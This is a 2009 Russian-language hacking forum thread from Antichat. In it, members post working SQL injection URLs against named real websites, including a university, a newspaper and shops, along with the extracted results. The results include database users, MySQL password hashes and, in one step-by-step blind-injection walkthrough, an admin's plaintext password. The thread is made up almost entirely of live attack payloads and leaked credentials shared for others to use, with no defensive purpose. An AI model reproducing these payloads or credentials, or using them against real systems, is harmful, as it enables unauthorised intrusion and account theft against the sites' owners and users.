Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.02.2009, 21:14
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.cashmerewholesalecentre.com/product.php?cid=-100'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,version(),database(),user()),12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35/*
Database Version: 4.1.22-community-nt
Database name: akee
User name: akee@localhost
Found table login with columns id,password,username
Have fun...
|
|
|
06.02.2009, 21:25
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Код:
http://www.rtos.com/page/product.php?id=-6+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4--
version(): 4.1.20-log
user(): expresslogic@216.119.112.142
database(): expresslogic
ТИЦ = 30
Код:
http://nlsod.ru/?d=o_company&f=company&id=-6+union+select+1,concat(version(),0x3a,user(),0x3a,database()),user+from+mysql.user+limit+0,1--
version(): 5.0.33
user(): root@localhost
database(): 1gb_nlsoddb
ТИЦ = 30
Код:
http://www.svadbaexpo.ru/index.php?id=-6+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3--
version(): 4.1.20-log
user(): dbu_tours_1@192.168.5.21
database(): db_tours_3
ТИЦ = 100 |
|
|
|
06.02.2009, 21:39
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Software shop...
http://www.piatadesoft.ro/public.php?vreau=infoprog&offset=19&go=40&prog=-2716+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,ver sion(),database(),user()),43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61/*
Database Version: 4.0.20
Database name: piatadesoft
User name: root@localhost
http://www.piatadesoft.ro/public.php?vreau=infoprog&offset=19&go=40&prog=-2716+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,use r,password),43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61+FROM+mysql.user/*
root:6ac227d531f5e2da
|
|
|
|
06.02.2009, 23:42
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Электронная библиотека.
Код:
http://kamonline.ru/index.php?action=viewcat&num=-1+union+select+concat(login,0x3a,passwd)+from+users--
mailbrush,
Не понял, это таже самая инъекция, зачем её баянить?
Последний раз редактировалось R1dex; 07.02.2009 в 01:20..
|
|
|
|
07.02.2009, 01:56
|
|
Новичок
Регистрация: 27.11.2008
Сообщений: 4
Провел на форуме:
52419
Репутация:
3
|
|
http://www.facilities.upenn.edu/mapsBldgs/view_map.php3?id=-44+union+select+1,2,3,4,version(),6,7,8,9,10,11--
|
|
|
|
07.02.2009, 04:23
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
http://www.photokzn.ru
так находим таблицу с пользователями:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),1 ,1))='117 = u
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),2 ,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),3 ,1))='101 = e
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),4 ,1))='114 = r
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),5 ,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),6 ,1))='0
таблица users
находим колонку с паролями:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),1,1))='112 = p
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),2,1))='97 = a
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),3,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),4,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),5,1))='0
колонка pass
находим колонку с логинами:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),1,1))='108 = l
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),2,1))='111 = o
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),3,1))='103 = g
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),4,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),5,1))='110 = n
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),6,1))='0
колонка login
Теперь вывод логина:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),1,1))='97 a
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),2,1))='100 d
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),3,1))='109 m
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),4,1))='105 i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),5,1))='110 n
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),6,1))='0
логин админа - admin
вывод пароля из users где имя пользователя admin
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),1,1))='116 = t
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),2,1))='104 = h
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),3,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),4,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),5,1))='116 = t
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),6,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),7,1))='109 = m
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),8,1))='101 = e
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),9,1))='0
пароль админа thistime
P.s. Там на сайте 5 версия MySQL, можно было бы провести иньекцию по другому, но я не ищу легких путей!!!!=))
|
|
|
|
07.02.2009, 08:36
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Медиа-уроки
Код:
http://media-lessons.com/video/-148+union+select+1,2,3,4,5,6,7+from+phpbb_users--
|
|
|
|
07.02.2009, 10:27
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
www.jvc.ro PR5
http://www.jvc.ro/product.php?id=EX-A10E&catid=100030[SQLINJ]
Version : PostgreSQL
Current_database : jvc-ro
Current_user: ppo
З.Ы. Уязвимы все сайты JVC в мире, сделаны они по одной и той же технологии только имена доменов разные и язык на котором предоставлена информация.
Скуля слепая... не раскручивал, кому интересно могу помочь
Последний раз редактировалось Gorev; 07.02.2009 в 10:31..
|
|
|
|
07.02.2009, 11:19
|
|
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572
Репутация:
34
|
|
apps.detnews.com
Pr 6
Код HTML:
http://apps.detnews.com/apps/history/index.php?id=-14+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,0,1,2,3,4+from+mysql.user
root:41221e5672a06384
johnd:2dd99728002374de
tdn:41221c6172a0658f
tdn:134e3e414b6b964f
jdaven:2dd99728002374de
ien:475dc867159e96ef
drupal_user:79bd7cfe7e82fdf1
|
|
|
|
07.02.2009, 11:27
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.aectra.ro/product.php?prod_id=-186+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(C ONCAT_WS(0x3a,Version(),Database(),User()),0x71),0 x71),6,7,8,9,10,11,12,13/*
Database Version: 4.1.11-Debian_4sarge7-log
Database name: aectra
User name: aectra@localhost
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
